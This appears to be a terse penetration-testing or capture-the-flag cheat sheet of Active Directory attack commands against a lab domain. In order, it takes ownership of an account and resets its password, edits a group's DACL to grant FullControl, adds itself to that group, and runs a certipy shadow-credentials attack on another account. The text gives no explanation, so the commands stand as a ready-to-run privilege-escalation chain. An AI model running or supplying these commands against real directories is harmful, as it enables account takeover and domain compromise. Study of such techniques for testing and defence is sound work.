Via Windows :
net group backups qu35t /add
Set-DomainObjectOwner -identity jeff -OwnerIdentity qu35t
Add-DomainObjectAcl -TargetIdentity jeff -PrincipalIdentity qu35t -Rights ResetPassword
$cred = ConvertTo-SecureString 'Passw0rd!' -AsPlainText -force
Set-DomainUserPassword -identity jeff -accountpassword $cred
getTGT.py qu35t.pw/qu35t
KRB5CCNAME=qu35t.ccache dacledit.py -k -no-pass -dc-ip 10.10.10.10 -principal qu35t -target "Network Audit" -action write -rights FullControl qu35t.pw/qu35t
net rpc group addmem "Network Audit" -k -U qu35t -S qu35t.pw qu35t
KRB5CCNAME=qu35t.ccache certipy shadow auto -k -no-pass -u qu35t.pw/qu35t@dc.qu35t.pw -dc-ip 10.10.10.10 -target dc.qu35t.pw --account yakei